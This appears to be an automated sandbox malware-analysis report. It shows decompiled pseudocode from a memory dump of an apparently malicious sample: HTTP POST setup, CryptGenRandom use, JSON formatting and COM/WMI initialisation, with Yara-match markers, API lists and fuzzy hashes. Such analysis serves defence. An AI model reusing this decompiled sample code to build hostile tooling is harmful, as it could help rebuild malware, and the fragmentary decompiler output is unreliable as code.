                                                                                                                                                                                                											L28:
                                                                                                                                                                                                											_v24 = 8;
                                                                                                                                                                                                											_push(0);
                                                                                                                                                                                                											_v32 = 0;
                                                                                                                                                                                                											_v28 = 0;
                                                                                                                                                                                                											_push( &_v24);
                                                                                                                                                                                                											_push( &_v32);
                                                                                                                                                                                                											_t147 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                											_push(0x13);
                                                                                                                                                                                                											_push(_t218);
                                                                                                                                                                                                											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                                                                                                                                                                                												_t219 = E00AF972A( &_v32);
                                                                                                                                                                                                												if(_t219 == 0xc8) {
                                                                                                                                                                                                													 *_a20 = _v8;
                                                                                                                                                                                                													 *_a12 = _t213;
                                                                                                                                                                                                													 *_a16 = _t186;
                                                                                                                                                                                                													return 0;
                                                                                                                                                                                                												}
                                                                                                                                                                                                												_t220 =  ~_t219;
                                                                                                                                                                                                												L32:
                                                                                                                                                                                                												_t154 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                												 *((intOrPtr*)(_t154 + 8))(_v8);
                                                                                                                                                                                                												L33:
                                                                                                                                                                                                												if(_t186 != 0) {
                                                                                                                                                                                                													_t158 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                													 *((intOrPtr*)(_t158 + 8))(_t186);
                                                                                                                                                                                                												}
                                                                                                                                                                                                												if(_t213 != 0) {
                                                                                                                                                                                                													_t203 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                													 *((intOrPtr*)(_t203 + 8))(_t213);
                                                                                                                                                                                                												}
                                                                                                                                                                                                												return _t220;
                                                                                                                                                                                                											}
                                                                                                                                                                                                											GetLastError();
                                                                                                                                                                                                											_t220 = 0xfffffff8;
                                                                                                                                                                                                											goto L32;
                                                                                                                                                                                                										} else {
                                                                                                                                                                                                											GetLastError();
                                                                                                                                                                                                											_t162 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                											 *((intOrPtr*)(_t162 + 8))(_t218);
                                                                                                                                                                                                											_t218 = 0;
                                                                                                                                                                                                											goto L23;
                                                                                                                                                                                                										}
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_v12 = _t138;
                                                                                                                                                                                                									_push( &_v12);
                                                                                                                                                                                                									_push( &_v16);
                                                                                                                                                                                                									_t172 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                									_push(0x1f);
                                                                                                                                                                                                									_push(_t216);
                                                                                                                                                                                                									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                                                                                                                                                                                										L18:
                                                                                                                                                                                                										GetLastError();
                                                                                                                                                                                                										goto L19;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_v16 = _v16 | 0x00003380;
                                                                                                                                                                                                									_push(4);
                                                                                                                                                                                                									_push( &_v16);
                                                                                                                                                                                                									_t176 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                									_push(0x1f);
                                                                                                                                                                                                									_push(_t216);
                                                                                                                                                                                                									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                                                                                                                                                                                										goto L19;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									GetLastError();
                                                                                                                                                                                                									L23:
                                                                                                                                                                                                									_t164 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                									 *((intOrPtr*)(_t164 + 8))(_t186);
                                                                                                                                                                                                									_t186 = 0;
                                                                                                                                                                                                									goto L24;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								GetLastError();
                                                                                                                                                                                                								L24:
                                                                                                                                                                                                								_t166 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                								 *((intOrPtr*)(_t166 + 8))(_t213);
                                                                                                                                                                                                								_t213 = 0;
                                                                                                                                                                                                								goto L25;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						GetLastError();
                                                                                                                                                                                                						L25:
                                                                                                                                                                                                						_t204 = _t218;
                                                                                                                                                                                                						_t209 = _v20 + 1;
                                                                                                                                                                                                						_v20 = _t209;
                                                                                                                                                                                                					} while (_t209 < 2);
                                                                                                                                                                                                					_v8 = _t218;
                                                                                                                                                                                                					if(_t204 != 0) {
                                                                                                                                                                                                						goto L28;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t220 = 0xfffffffe;
                                                                                                                                                                                                					goto L33;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t183 = 0xfffffffc;
                                                                                                                                                                                                				return _t183;
                                                                                                                                                                                                			}



































































                                                                                                                                                                                                0x00afe93a
                                                                                                                                                                                                0x00afe943
                                                                                                                                                                                                0x00afe98c
                                                                                                                                                                                                0x00afe98e
                                                                                                                                                                                                0x00afe995
                                                                                                                                                                                                0x00afe996
                                                                                                                                                                                                0x00afe999
                                                                                                                                                                                                0x00afe99f
                                                                                                                                                                                                0x00afe9a3
                                                                                                                                                                                                0x00afe9a4
                                                                                                                                                                                                0x00afe9a9
                                                                                                                                                                                                0x00afe9ab
                                                                                                                                                                                                0x00afe9b1
                                                                                                                                                                                                0x00afe9c6
                                                                                                                                                                                                0x00afe9ce
                                                                                                                                                                                                0x00afea03
                                                                                                                                                                                                0x00afea08
                                                                                                                                                                                                0x00afea0d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afea0f
                                                                                                                                                                                                0x00afe9d0
                                                                                                                                                                                                0x00afe9d2
                                                                                                                                                                                                0x00afe9d2
                                                                                                                                                                                                0x00afe9db
                                                                                                                                                                                                0x00afe9de
                                                                                                                                                                                                0x00afe9e0
                                                                                                                                                                                                0x00afe9e2
                                                                                                                                                                                                0x00afe9e8
                                                                                                                                                                                                0x00afe9e8
                                                                                                                                                                                                0x00afe9ed
                                                                                                                                                                                                0x00afe9ef
                                                                                                                                                                                                0x00afe9f6
                                                                                                                                                                                                0x00afe9f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe9f9
                                                                                                                                                                                                0x00afe9b3
                                                                                                                                                                                                0x00afe9bb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe945
                                                                                                                                                                                                0x00afe945
                                                                                                                                                                                                0x00afe94b
                                                                                                                                                                                                0x00afe951
                                                                                                                                                                                                0x00afe954
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe954
                                                                                                                                                                                                0x00afe943
                                                                                                                                                                                                0x00afe8c0
                                                                                                                                                                                                0x00afe8c6
                                                                                                                                                                                                0x00afe8ca
                                                                                                                                                                                                0x00afe8cb
                                                                                                                                                                                                0x00afe8d0
                                                                                                                                                                                                0x00afe8d2
                                                                                                                                                                                                0x00afe8d8
                                                                                                                                                                                                0x00afe8f6
                                                                                                                                                                                                0x00afe8f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe8f6
                                                                                                                                                                                                0x00afe8da
                                                                                                                                                                                                0x00afe8e4
                                                                                                                                                                                                0x00afe8e6
                                                                                                                                                                                                0x00afe8e7
                                                                                                                                                                                                0x00afe8ec
                                                                                                                                                                                                0x00afe8ee
                                                                                                                                                                                                0x00afe8f4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe8ad
                                                                                                                                                                                                0x00afe8ad
                                                                                                                                                                                                0x00afe956
                                                                                                                                                                                                0x00afe956
                                                                                                                                                                                                0x00afe95c
                                                                                                                                                                                                0x00afe95f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe95f
                                                                                                                                                                                                0x00afe85e
                                                                                                                                                                                                0x00afe85e
                                                                                                                                                                                                0x00afe961
                                                                                                                                                                                                0x00afe961
                                                                                                                                                                                                0x00afe967
                                                                                                                                                                                                0x00afe96a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe96a
                                                                                                                                                                                                0x00afe85c
                                                                                                                                                                                                0x00afe7c7
                                                                                                                                                                                                0x00afe96c
                                                                                                                                                                                                0x00afe96f
                                                                                                                                                                                                0x00afe971
                                                                                                                                                                                                0x00afe974
                                                                                                                                                                                                0x00afe977
                                                                                                                                                                                                0x00afe980
                                                                                                                                                                                                0x00afe985
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe989
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe989
                                                                                                                                                                                                0x00afe796
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ErrorLast
                                                                                                                                                                                                • String ID: POST
                                                                                                                                                                                                • API String ID: 2570506013-1814004025
                                                                                                                                                                                                • Opcode ID: f5bb8848fbc0d9638fced08aae5dab1702d292cbf7d036199f8fbade9779a510
                                                                                                                                                                                                • Instruction ID: 70ddc5dbbbab7b545301141e193298827fd2b5885976a5f59dcf2e5d0d58d02c
                                                                                                                                                                                                • Opcode Fuzzy Hash: f5bb8848fbc0d9638fced08aae5dab1702d292cbf7d036199f8fbade9779a510
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16B13EB1900218AFDB15DFD4DD88AAEBBB8EF58310F104469F615EB2A0DB749A44CF61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 28%
                                                                                                                                                                                                			E00B016F0(signed int* _a4) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                				_Unknown_base(*)()* _t16;
                                                                                                                                                                                                				_Unknown_base(*)()* _t17;
                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                				signed int _t30;
                                                                                                                                                                                                				struct HINSTANCE__* _t32;
                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t30 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_t32 = GetModuleHandleA("advapi32.dll");
                                                                                                                                                                                                				if(_t32 == 0) {
                                                                                                                                                                                                					L9:
                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                                                                                                                                                                                				_v12 = _t16;
                                                                                                                                                                                                				if(_t16 == 0) {
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                                                                                                                                                                                				_v16 = _t17;
                                                                                                                                                                                                				if(_t17 == 0) {
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                                                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push(0xf0000000);
                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                				if(_v12() == 0) {
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t22 = _v16(_v8, 4,  &_v20);
                                                                                                                                                                                                				 *_t28(_v8, 0);
                                                                                                                                                                                                				if(_t22 == 0) {
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t29 = 0;
                                                                                                                                                                                                				do {
                                                                                                                                                                                                					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                                                                                                                                                                                					_t29 = _t29 + 1;
                                                                                                                                                                                                				} while (_t29 < 4);
                                                                                                                                                                                                				 *_a4 = _t30;
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}
















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,00AF763B,?,?,00000000,?), ref: 00B01703
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00B0171B
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00B0172A
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00B01739
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                • API String ID: 667068680-129414566
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                			E00B0215A(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                                				signed int _t12;
                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                				char* _t24;
                                                                                                                                                                                                				char* _t26;
                                                                                                                                                                                                				char* _t28;
                                                                                                                                                                                                				char* _t29;
                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                				char* _t43;
                                                                                                                                                                                                				char* _t45;
                                                                                                                                                                                                				long long* _t47;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t12 = _a20;
                                                                                                                                                                                                				if(_t12 == 0) {
                                                                                                                                                                                                					_t12 = 0x11;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t26 = _a4;
                                                                                                                                                                                                				_push(_t30);
                                                                                                                                                                                                				 *_t47 = _a12;
                                                                                                                                                                                                				_push(_t12);
                                                                                                                                                                                                				_push("%.*g");
                                                                                                                                                                                                				_push(_a8);
                                                                                                                                                                                                				_push(_t26);
                                                                                                                                                                                                				L00B022BD();
                                                                                                                                                                                                				_t40 = _t12;
                                                                                                                                                                                                				if(_t40 < 0 || _t40 >= _a8) {
                                                                                                                                                                                                					L19:
                                                                                                                                                                                                					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					L00B02305();
                                                                                                                                                                                                					_t15 =  *((intOrPtr*)( *_t12));
                                                                                                                                                                                                					if(_t15 != 0x2e) {
                                                                                                                                                                                                						_t24 = strchr(_t26, _t15);
                                                                                                                                                                                                						if(_t24 != 0) {
                                                                                                                                                                                                							 *_t24 = 0x2e;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                                                                                                                                                                                						L11:
                                                                                                                                                                                                						_t43 = strchr(_t26, 0x65);
                                                                                                                                                                                                						_t28 = _t43;
                                                                                                                                                                                                						if(_t43 == 0) {
                                                                                                                                                                                                							L18:
                                                                                                                                                                                                							_t13 = _t40;
                                                                                                                                                                                                							L20:
                                                                                                                                                                                                							return _t13;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t45 = _t43 + 1;
                                                                                                                                                                                                						_t29 = _t28 + 2;
                                                                                                                                                                                                						if( *_t45 == 0x2d) {
                                                                                                                                                                                                							_t45 = _t29;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						while( *_t29 == 0x30) {
                                                                                                                                                                                                							_t29 = _t29 + 1;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_t29 != _t45) {
                                                                                                                                                                                                							E00AF86E7(_t45, _t29, _t40 - _t29 + _a4);
                                                                                                                                                                                                							_t40 = _t40 + _t45 - _t29;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t6 = _t40 + 3; // 0xb009ea
                                                                                                                                                                                                						_t12 = _t6;
                                                                                                                                                                                                						if(_t12 >= _a8) {
                                                                                                                                                                                                							goto L19;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t26[_t40] = 0x302e;
                                                                                                                                                                                                						( &(_t26[2]))[_t40] = 0;
                                                                                                                                                                                                						_t40 = _t40 + 2;
                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}















                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strchr$_snprintflocaleconv
                                                                                                                                                                                                • String ID: %.*g
                                                                                                                                                                                                • API String ID: 1910550357-952554281
                                                                                                                                                                                                • Opcode ID: 097a9b1a483c91d0c97b532d42bf1d83d3f9611918ae2bc1a2423cae38386bfa
                                                                                                                                                                                                • Instruction ID: 0ea98a9de41edccd7386c7de003231cd7951298259203088e14d194ac2e098f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 097a9b1a483c91d0c97b532d42bf1d83d3f9611918ae2bc1a2423cae38386bfa
                                                                                                                                                                                                • Instruction Fuzzy Hash: BF2148762446052AD7255BA8ECCDB6B7FCCEF05720F1401D5FA408A2C2DA75DD4882A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snprintfqsort
                                                                                                                                                                                                • String ID: %I64d$false$null$true
                                                                                                                                                                                                • API String ID: 756996078-4285102228
                                                                                                                                                                                                • Opcode ID: ffa92c4de3096342d87f77d895fdd7994b491cb2fd30e4f5906c2860b0e99d84
                                                                                                                                                                                                • Instruction ID: 9580fd42f4d76791c0f72eae433df8672b9805448f8042b9d38bf2b39e9f1254
                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa92c4de3096342d87f77d895fdd7994b491cb2fd30e4f5906c2860b0e99d84
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE17F7152020ABFDF11AF64CC82FAF3FE9EF59340F1080A9FD1596191E631DA609BA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFD79E
                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AFD7A6
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFD7BA
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFD835
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFD838
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFD83D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                • Opcode ID: e32b3dacb1af8dfd2b315176a772aeadf8812d358e08236597f9a0d56d7cc2a1
                                                                                                                                                                                                • Instruction ID: e157eab5f8066c35b7afa028e17947f932214f6c61b6b3e4c6bf4963470f7de5
                                                                                                                                                                                                • Opcode Fuzzy Hash: e32b3dacb1af8dfd2b315176a772aeadf8812d358e08236597f9a0d56d7cc2a1
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21F775A0021CAFDB01DFA5CC88DAFBBBDEF48354B10449AF505E7251DA71AE05DBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                                • API String ID: 0-2132903582
                                                                                                                                                                                                • Opcode ID: 04619db877638d261879d392a12905ffde1f4938fdaa2ed52d63b66d004af950
                                                                                                                                                                                                • Instruction ID: f0bea805f6eaa9c086ef337ed7444325d5c0e05958cf25fbe570983af514488b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04619db877638d261879d392a12905ffde1f4938fdaa2ed52d63b66d004af950
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7541CA3162030557FB247A5C8D9ABBE3EE4EF45710F1400F5F982E62D3D661CE9196D1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 30%
                                                                                                                                                                                                			E00AFD565(void* __ecx) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				char* _t15;
                                                                                                                                                                                                				intOrPtr* _t16;
                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                                                                				intOrPtr* _t24;
                                                                                                                                                                                                				intOrPtr* _t25;
                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                                				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                                				_t15 =  &_v12;
                                                                                                                                                                                                				__imp__CoCreateInstance(0xb0b848, 0, 1, 0xb0b858, _t15);
                                                                                                                                                                                                				if(_t15 < 0) {
                                                                                                                                                                                                					L5:
                                                                                                                                                                                                					_t23 = _v8;
                                                                                                                                                                                                					if(_t23 != 0) {
                                                                                                                                                                                                						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t24 = _v12;
                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t16 = 0;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					__imp__#2(__ecx);
                                                                                                                                                                                                					_t25 = _v12;
                                                                                                                                                                                                					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                                					if(_t21 < 0) {
                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                                						if(_t21 < 0) {
                                                                                                                                                                                                							goto L5;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t16 = E00AF85E5(8);
                                                                                                                                                                                                							if(_t16 == 0) {
                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                                								 *_t16 = _v8;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t16;
                                                                                                                                                                                                			}














                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD578
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD589
                                                                                                                                                                                                • CoCreateInstance.OLE32(00B0B848,00000000,00000001,00B0B858,?,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5A0
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFD5AB
                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5D6
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1610782348-0
                                                                                                                                                                                                • Opcode ID: db985832b1312899c2120c990a3aa754436c985919a11b6b2a61cafc5f06f068
                                                                                                                                                                                                • Instruction ID: dab049af343353be544fdd0548843016b8d0f26a7b672ee2f81f710eb5f2ede9
                                                                                                                                                                                                • Opcode Fuzzy Hash: db985832b1312899c2120c990a3aa754436c985919a11b6b2a61cafc5f06f068
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46210930600249BBD7258BA6DC4DE6BBFBDEFC6B15F10415DB601AB2A0DB709A01CA70
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E00B02237(char* __eax, char** _a4, long long* _a8) {
                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                				long long _v16;
                                                                                                                                                                                                				char* _t9;
                                                                                                                                                                                                				signed char _t11;
                                                                                                                                                                                                				char** _t19;
                                                                                                                                                                                                				char _t22;
                                                                                                                                                                                                				long long _t32;
                                                                                                                                                                                                				long long _t33;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t9 = __eax;
                                                                                                                                                                                                				L00B02305();
                                                                                                                                                                                                				_t19 = _a4;
                                                                                                                                                                                                				_t22 =  *__eax;
                                                                                                                                                                                                				if( *_t22 != 0x2e) {
                                                                                                                                                                                                					_t9 = strchr( *_t19, 0x2e);
                                                                                                                                                                                                					if(_t9 != 0) {
                                                                                                                                                                                                						 *_t9 =  *_t22;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				L00B022C9();
                                                                                                                                                                                                				 *_t9 =  *_t9 & 0x00000000;
                                                                                                                                                                                                				_t11 = strtod( *_t19,  &_v8);
                                                                                                                                                                                                				asm("fst qword [ebp-0xc]");
                                                                                                                                                                                                				_t32 =  *0xb08250;
                                                                                                                                                                                                				asm("fucomp st1");
                                                                                                                                                                                                				asm("fnstsw ax");
                                                                                                                                                                                                				if((_t11 & 0x00000044) != 0) {
                                                                                                                                                                                                					L5:
                                                                                                                                                                                                					st0 = _t32;
                                                                                                                                                                                                					L00B022C9();
                                                                                                                                                                                                					if( *_t11 != 0x22) {
                                                                                                                                                                                                						_t33 = _v16;
                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						return _t11 | 0xffffffff;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t33 =  *0xb08258;
                                                                                                                                                                                                					asm("fucomp st1");
                                                                                                                                                                                                					asm("fnstsw ax");
                                                                                                                                                                                                					if((_t11 & 0x00000044) != 0) {
                                                                                                                                                                                                						L8:
                                                                                                                                                                                                						 *_a8 = _t33;
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}












                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _errno$localeconvstrchrstrtod
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1035490122-0
                                                                                                                                                                                                • Opcode ID: 3529b2aa341f73d116a5920037f50c9d36422ecffe9bd8eb07aa47b601c7981a
                                                                                                                                                                                                • Instruction ID: 2b0c5d1d501ee5792950c95703a21feb008cf24e200e61fe6f0746773f7c0c22
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3529b2aa341f73d116a5920037f50c9d36422ecffe9bd8eb07aa47b601c7981a
